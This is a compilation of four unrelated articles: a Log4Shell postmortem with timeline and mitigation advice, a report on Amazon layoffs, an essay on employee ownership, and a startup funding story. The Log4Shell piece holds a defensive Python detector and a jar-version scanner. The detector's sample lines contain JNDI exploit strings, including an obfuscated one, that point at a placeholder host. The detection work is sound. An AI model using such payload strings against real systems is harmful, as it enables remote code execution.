

The Log4Shell vulnerability: A postmortem



This article was contributed by Ariel Assaraf, CEO of Coralogix 

The Log4shell vulnerability was a fitting, panicked end to what was already a difficult year. Now that the initial panic is out of the way, and there are some tried and tested methods for detecting and mitigating the vulnerability — it is essential to stop and reflect on just what happened in those last few weeks of 2021. Specifically, to reflect on what went well and what could have gone better. What better way to do that than with a postmortem?

Overview & impact of the Log4shell vulnerability

The Log4shell vulnerability was a weakness in the JNDI lookup functionality of Log4j2, in versions 2.0 through 2.14. It allowed an attacker who controlled what was printed in the logs (for example, when a server logs an HTTP header) to execute whatever code they liked.

Log4j2 is ubiquitous among applications and the libraries on which they depend, meaning that many applications were using Log4j2 without realizing it. Even applications not written in Java are often hosted in web containers, so a project can have no apparent dependency on Log4j2 and still be exposed. This resulted in a massive impact across nearly every industry.
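The attacker-controlled input described above reaches the vulnerable code as a Log4j2 lookup string. As an added illustration (not code from the original article), here is a small defensive detector for that lookup pattern, run over constructed log lines; the host name and the lines themselves are made up, and the wrapper handling is my own assumption about what a useful detector needs:

```python
import re

# Log4j2 lookups are written ${name:...}; Log4Shell fires when a "jndi" lookup
# reaches the message formatter. Default lookups such as lower/upper and the
# "::-" default-value form can wrap letters of "jndi", so the detector first
# collapses those wrappers and then looks for the jndi lookup itself.
WRAPPER = re.compile(
    r"\$\{\s*(?:lower|upper)\s*:\s*([^}]*)\}|\$\{\s*::-([^}]*)\}", re.IGNORECASE)
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalise(text: str) -> str:
    """Repeatedly unwrap lower/upper/default-value lookups until none remain."""
    previous = None
    while previous != text:
        previous = text
        text = WRAPPER.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), text)
    return text


def is_jndi_lookup(line: str) -> bool:
    """True if the line contains a (possibly wrapped) JNDI lookup string."""
    return JNDI_LOOKUP.search(normalise(line)) is not None


def scan(lines):
    """Return (line_number, line) for every line that should be investigated."""
    return [(n, line) for n, line in enumerate(lines, start=1) if is_jndi_lookup(line)]


# Constructed sample log lines; the host is a placeholder, not a real indicator.
SAMPLE_LOG = [
    '2021-12-10T12:00:01Z INFO  GET /index.html ua="Mozilla/5.0"',
    '2021-12-10T12:00:02Z INFO  GET /login ua="${jndi:ldap://placeholder.invalid/x}"',
    '2021-12-10T12:00:03Z INFO  GET /login ua="${${lower:j}ndi:ldap://placeholder.invalid/x}"',
    '2021-12-10T12:00:04Z INFO  build=${env:BUILD_ID} ready',
]

if __name__ == "__main__":
    for n, line in scan(SAMPLE_LOG):
        print(f"line {n}: {line}")
```

Only lines 2 and 3 are flagged; the ordinary `${env:...}` lookup on line 4 is not a JNDI lookup and is left alone.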

The root cause of the Log4shell vulnerability

For an issue like this, the root cause was not a single event. The original feature made its way into a release without security scrutiny. The core contributors to Log4j2 have, no doubt, been reflecting on how they can improve their security assessment processes.

Libraries like Log4j2 are also large and complex, meaning that the vast majority of teams were not using the vulnerable JNDI lookup functionality at all. This vulnerable code made its way into their applications because of the monolithic nature of these dependencies. A more composable approach to Log4j2 functionality might have significantly reduced the potential impact of the Log4j2 vulnerability. Still, it would have come at the cost of ease of use for those engineers who did depend on it.

So, what went well?

The response from the industry regarding the Log4shell vulnerability was immediate and effective. Open source communities created resources, drafted blog posts, and implemented patches. This effort enabled organizations to remain ahead of the curve and proactively mitigate problems rather than frantically reacting.

In addition, the core contributors to the Log4j2 library were incredibly diligent in their releases. While it was a bit of a bumpy ride (more on this later), they quickly iterated to a sensible release that was backward compatible with all but the vulnerable functionality.

These positives speak to the elegant beauty of the open source philosophy: focused communities of experts working on behalf of an enormous pool of organizations. Sometimes they make mistakes, much like any engineering effort, but those mistakes are rapidly detected and fixed.

What didn’t go so well?

The obvious problem with the Log4shell vulnerability is the very nature of it. The code was baked into thousands of applications, and each one needed to be mitigated, tested, and deployed into production. For some organizations, this was business as usual. Others were still operating on slow release cycles, and this sudden change would have been a massive disturbance to their way of working.

There was also some confusion about the correct mitigation path during the incident as the understanding of the Log4shell vulnerability grew. This meant that organizations that had been proactive were then forced to go back and start again; the timeline below gives a flavor of this confusion.

Timeline of events

December 9, 2021

The original Log4Shell vulnerability was found. The advice was to mitigate the issue by setting the LOG4J_FORMAT_MSG_NO_LOOKUPS environment variable or its corresponding configuration flag. At the same time, version 2.15 was released, which disabled this functionality by default.

December 14, 2021

A second vulnerability was found in version 2.15 of Log4j. This was a “denial of service” vulnerability, enabling malicious agents to slow down and ultimately halt targeted systems. The advice changed from setting a configuration value to upgrading to the newly released version 2.16. This CVE was initially rated relatively low, 3.7/10, but was re-scored at 9.8/10, meaning organizations that had made a rather sensible risk-based decision were forced to pivot again and migrate.

December 17, 2021

A third vulnerability was found in version 2.16. This was another “denial of service” attack that had a similar effect to the previous vulnerability. To mitigate this, version 2.17 was released. Because of the relatively high score given to this CVE, 7.5/10, organizations were advised to migrate to version 2.17 as soon as possible.

December 28, 2021

A fourth vulnerability was found in version 2.17. This vulnerability was less severe than its predecessors (6.6/10) and required other parts of the target system to be already compromised: it required that configuration was being loaded from a remote server, which meant it would not have as broad an impact. This led to the release of 2.17.1.
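Because the timeline above moved the "safe" version four times, teams needed an inventory of exactly which log4j-core builds were deployed, including copies hidden inside application fat jars (the hidden-dependency problem described earlier). As an added example (not the article's own code or tooling), the scanner below pulls the log4j-core version out of a jar, descends into nested jars, and classifies each hit against the article's timeline; the sample jar is constructed in memory, and the mapping from version to verdict is my reading of the 2.x timeline only (the backport branches for older JVMs are not modelled).

```python
import io
import re
import zipfile

# Maven metadata that log4j-core ships inside its jar; the version line lives here.
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?")


def classify(version: str) -> str:
    """Map a log4j-core 2.x version onto the article's timeline.
    Assumption: the 2.3.x / 2.12.x backport branches are not modelled here."""
    m = VERSION_RE.match(version)
    if not m:
        return "UNKNOWN: unparsable version"
    major, minor, patch = int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)
    if major != 2:
        return "UNKNOWN: not a 2.x release"
    if minor <= 14:
        return "VULNERABLE: Log4Shell (JNDI lookup) - upgrade"
    if minor == 15:
        return "VULNERABLE: denial of service fixed in 2.16"
    if minor == 16:
        return "VULNERABLE: denial of service fixed in 2.17"
    if minor == 17 and patch == 0:
        return "VULNERABLE: remote-configuration issue fixed in 2.17.1"
    return "OK: 2.17.1 or later"


def log4j_versions(jar_bytes: bytes, path: str = "<root>") -> list:
    """Return (location, version) for every log4j-core found, descending into
    nested jars so shaded/fat jars are not missed."""
    found = []
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        for name in zf.namelist():
            if name == POM_PROPERTIES:
                m = re.search(rb"^version=(.+)$", zf.read(name), re.MULTILINE)
                if m:
                    found.append((path, m.group(1).decode().strip()))
            elif name.endswith(".jar"):
                found.extend(log4j_versions(zf.read(name), f"{path}!{name}"))
    return found


def report(jar_bytes: bytes) -> list:
    """(location, version, verdict) for each log4j-core inside the jar."""
    return [(loc, ver, classify(ver)) for loc, ver in log4j_versions(jar_bytes)]


def _make_jar(entries: dict) -> bytes:
    """Build an in-memory jar (zip) from {entry_name: bytes}; used for the sample."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


# Constructed sample: an application fat jar bundling log4j-core 2.14.1 one level down.
SAMPLE_FAT_JAR = _make_jar({
    "BOOT-INF/classes/app.properties": b"name=demo\n",
    "BOOT-INF/lib/log4j-core-2.14.1.jar": _make_jar(
        {POM_PROPERTIES: b"groupId=org.apache.logging.log4j\nversion=2.14.1\n"}),
})

if __name__ == "__main__":
    for loc, ver, verdict in report(SAMPLE_FAT_JAR):
        print(f"{loc}: log4j-core {ver} -> {verdict}")
```

Point `report()` at the bytes of a real deployed jar to get the same inventory; a jar with no log4j-core anywhere inside it yields an empty list.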

So what’s next?

There are some serious questions that need to be asked. Firstly, is the current method of dependency management fit for purpose in a world of microservices, where the same dependency is copied across dozens, hundreds, or maybe thousands of instances?

Secondly, is there a need to migrate to smaller, composable libraries rather than monolithic libraries that bring in a great deal of unwanted functionality? Most of the victims of this vulnerability were not using the JNDI lookup code in the first place. Engineers regularly smuggle torrents of unnecessary and potentially hazardous code into their binaries, especially in languages like Java, which frequently favor large, heavily configurable dependencies.

Finally, some measure of acceptance needs to come with these criticisms. Zero-day vulnerabilities will happen. They’re an inevitable result of sharing code, which is undoubtedly worth the risk. Your challenge is to decide what processes, technologies, and tooling you want to put in place to get you through the next one.

The trick is responding quickly, and there are things we can do to raise vulnerabilities to our attention promptly.

  • Automatic Log4shell vulnerability scans

You can use tools like Snyk to detect vulnerabilities in your dependencies automatically. You can also configure them to fail your CI/CD pipelines automatically if you want to prevent critical vulnerabilities from even being deployed. This is a strict but powerful mechanism for preventing issues from being released.

  • The CVE Twitter feed

The CVE Twitter feed is a great way for you to keep on top of vulnerabilities as they are released. It may be a lot of information to process, but you’ll know the awful ones by all the likes and retweets.

All in all

It was a complex few weeks for engineering teams all over the globe. Still, if this vulnerability has proven anything, it is that the open source community is resilient to failure, extremely responsive, and diligent. While this was a severe vulnerability that will undoubtedly linger for years to come, it was quickly mitigated and contained by the rapid response of a community of focused and diligent engineers.

Ariel Assaraf is CEO of Coralogix



Amazon may lay off 20,000 employees, including managers: Report



Amazon may lay off about 20,000 employees across divisions as the company reevaluates its pandemic-induced hiring spree, according to a media report.

A Computerworld report stated that the tech giant could lay off employees across the company, including distribution centre workers, technology staff, and corporate executives. Staff at all levels will likely be affected, it found.

Last month, the New York Times reported that Amazon plans to lay off approximately 10,000 people, and “the cuts will focus on Amazon’s devices organisation, including the voice-assistant Alexa, as well as at its retail division and in human resources”.

However, according to Computerworld, the layoffs could impact nearly double that number of employees: roughly 6% of the company’s corporate employees and about 1.3% of its global workforce of more than 1.5 million, which is composed primarily of hourly workers.

YourStory could not independently verify the report.

Corporate staff have been told that employees will receive a 24-hour notice and severance pay, in accordance with their company contracts, the Computerworld report noted. “There is a sense of fear among employees in the company as the news has come out,” the report added, quoting a source who was informed directly about the layoff effort.

The layoffs would be the largest staff reduction in Amazon’s history.

“There is no specific department or location mentioned for the cuts; it is across the business. We were told this is as a result of over-hiring during the pandemic and the need for cost-cutting as the company’s financials have been on a declining trend,” the source told Computerworld.

After the New York Times report, Amazon Chief Executive Officer Andy Jassy shared some information about role eliminations in a note. Jassy confirmed that layoffs were occurring, though he did not specify the planned number of employees to be laid off.

“Our annual planning process extends into the new year, which means there will be more role reductions as leaders continue to make adjustments. Those decisions will be shared with impacted employees and organisations early in 2023,” Jassy wrote in the message, noting that Amazon had already communicated that layoffs would occur in the Devices and Books businesses, and would be extending a voluntary reduction offer for some employees in the People, Experience, and Technology (PXT) organisation. 

“We haven’t concluded yet exactly how many other roles will be impacted (we know that there will be reductions in our Stores and PXT organisations), but each leader will communicate to their respective teams when we have the details nailed down,” Jassy noted.

Meanwhile, the Computerworld report noted that employees on Amazon’s robotics team have been laid off.

Amazon’s muted third-quarter earnings as well as disappointing fourth-quarter projections led the company’s stock to plummet. Its third-quarter earnings were severely impacted by unpredictable consumer shopping habits and inflation. 

Amazon is likely to lay off several employees in India across divisions, according to media reports. Last month, Amazon confirmed that it will shut down its wholesale unit Amazon Distribution. This is the third business unit to be closed after the e-commerce giant announced the wrapping up of Amazon Academy and the food delivery business in India.

Globally, tech companies have announced layoffs as part of their cost-cutting efforts. In November, Meta CEO Mark Zuckerberg announced that the company had decided to reduce the size of its team by about 13%, cutting over 11,000 jobs. In the same month, Elon Musk reduced half of Twitter’s workforce or about 3,700 jobs at the social media firm.



Unlock The Entrepreneurial Potential Of Your Team With Employee-Ownership



A strong team of many outperforms even the most hardworking of entrepreneurs on their own. But when hiring employees, freelancers and contractors, how do you ensure they have the same entrepreneurial skills and drive that you do as your company’s owner? Is it unrealistic to expect employees to be motivated and committed to an organisation they didn’t found?

Nicki Sprinz thinks she has cracked the code of unlocking the entrepreneurial potential of your team, and the answer lies in employee ownership. Sprinz is managing director of B-Corp certified ustwo London, a company of over 200 employees, and cofounder of Ada’s List, an 8000-strong community designed to support women working in the tech industry. ustwo has recently become employee-owned and has already seen the benefits of breaking down the distinction between owners and employees.

According to the Employee Ownership Association, this way of working can improve productivity, support more resilient regional economies and empower team members, resulting in them being far more engaged. Sprinz explained the main benefit for entrepreneurs of this model along with practical tips for managing directors and company founders to make the transition to becoming employee-owned.

Employee ownership protects the company

“Being employee-owned means existing team members, who are now partners, feel empowered as owners,” said Sprinz. She believes that this encourages everyone to put in the work to uphold a strong company culture and course-correct if they see anything awry.

Whilst this might not happen automatically, a founder can make it more likely that their team upholds the vision. Sprinz has put frameworks in place to ensure everyone has a voice. “We hold open firesides, have elected partner representatives on the board, and ensure there are regular channels of communication for all team members to be part of growing the culture and living the values,” she said.

Keeping the team on board means protecting the company. “There are no surprises about the direction we are taking with the business,” explained Sprinz. “We involve everyone in the decisions we make on our projects and ensure we are accountable, both commercially and ethically.”

Attract and retain top talent

In a competitive market, how does your company attract and retain the best talent in the world for the benefit of your clients? Employee-ownership could be the solution. Not only does it make job listings stand out, but it attracts individuals who are like-minded and think long term. They are committed to a future with whichever company they choose to join and are prepared to push themselves to make it happen.

“High quality potential recruits and employees are interested in values and purpose,” said Sprinz. “Being able to talk about employee ownership helps you stand out in a tough hiring market. We have several interview stages so a candidate can get to know us as well as we’d like to know them.”

Sprinz’ interview stages aim to weed out “cultural and value mismatches that ultimately lead to an unfulfilled team.” They ask candidates multiple questions about their values and examples of them in practice, and they encourage candidates to probe with questions about ustwo. They also “publicise the salary for all open roles and candidates have the opportunity to meet other members of the team,” she added.

Control quality

When scaling a business, ambitious entrepreneurs cannot afford to let quality slip. Growth at all costs is a false economy that ends with the business back at square one and having to work harder to undo reputational damage. “A more entrepreneurial team ensures quality stays high,” explained Sprinz. Not only do your team members care deeply about the work they do, they also know they benefit from company growth, so they are incentivised to keep raising the bar.

“If your team is invested in the long term financial success of the company, they also feel pride that their work contributes to overall success,” said Sprinz. “They respond by raising the bar on their work.” Sprinz also believes that, “Regular transparent sharing of financial results and metrics maintains dialogue on personal and company impact.”

Direct the future

An employee-owned company has options for the future. The owner might one day want to step aside or sell, and the company’s succession plan will already be in place. In the meantime, the company has hit new heights and progressed with new ideas because its foundations are solid.

Like Maslow’s Hierarchy of Needs, you cannot reach self-actualisation without warmth and shelter, and a company cannot break through ceilings with constant recruitment issues. When team members are bought into the company, they are bought into its future too, making more certain outcomes for everyone involved.

“The partner representatives on the board surface the priorities of the rest of the team and ensure the conversations of the board are directed accordingly,” explained Sprinz. “The representatives are actively part of the bigger picture and playing a huge part in shaping the company’s future.”

Unlock the entrepreneurial potential of your team by exploring employee ownership, advised Sprinz. The best people will be proud to tell their friends that they are part-owners of the place they work. They will feel valued and listened to and respond with their effort and devotion. Could employee ownership be the right step forward for you?



With $3M new funding, Egyptian startup OneOrder sets out on growth drive • TechCrunch



OneOrder, Egypt’s supply chain solutions provider for restaurants, has raised $3 million in seed funding led by Nclude with participation from A15 and Delivery Hero Ventures. The latest round brings the total funding raised by the startup to $10.5 million, including $6.5 million in working capital financing from financial institutions.

Launched in March this year, OneOrder makes it possible for restaurants to order food supplies through its online platform, solving the fragmented supply chain challenges that lead to erratic prices, waste, quality issues, and storage cost.

By using its platform, restaurants no longer have to deal with tens of suppliers, and can order only what they need, for next day delivery, stemming wastage and doing away with the need for warehouses. The platform also ensures operational efficiency and helps restaurants save money by leveraging OneOrder’s economies of scale.

The startup plans to use the funding to scale its operations in Egypt including increasing its warehouse footprint, and to explore growth opportunities within the Gulf Cooperation Council (GCC) region, and Africa.

“We are exploring Saudi Arabia and expanding south into our continent. I think Africa has a lot of markets that feel the same pain points that Egypt does,” said OneOrder co-founder and CEO Tamer Amer, who co-founded OneOrder with Karim Maurice (CTO), also the founder of Cube, an online restaurant-reservation service.

“The solution that we’re providing has shown that this industry is ready for tech solutions…[and] we are working on a more substantial operating system for the restaurants not just the supply chain and inventory management system, rather the full cycle that would turn their operations automatic by using AI and machine learning capabilities to drive the supply chain,” said Amer, a restaurateur for over two decades, initially in the U.S before settling in Egypt from 2008.

Amer told TechCrunch that the sourcing challenges he experienced operating two restaurants in Egypt — Fuego, a sushi bar, and Longhord Texas Barbeque — inspired the launch of OneOrder, to serve the country’s total addressable market of 400,000 restaurants.

“I had always taken the supply chain in the U.S. for granted; we would order and get the supplies all the time. We didn’t have to worry about shortages or price changes. I realized that Egypt is so underserved and the industry is really doing a lot of things that we shouldn’t be doing,” he said.

“… restaurants should not have a full-time job monitoring the supply chain and procuring products because it takes away focus on the core business, which is serving customers. So that’s where the idea really started,” he said.

OneOrder plans to, through its partners and backed by its extensive data, begin extending working capital financing options to restaurants as a way of helping them scale their operations.

Basil Moftah, the managing partner at Nclude, said: “The product-market fit of the OneOrder solution is very impressive, along with the positive impact it is delivering to all stakeholders in the value chain. Through the use of technology and alternative data, OneOrder’s embedded financing will help underserved clients who are unable to secure traditional financing. This aligns perfectly with our investing philosophy and we are glad to be embarking on this journey with the team.”
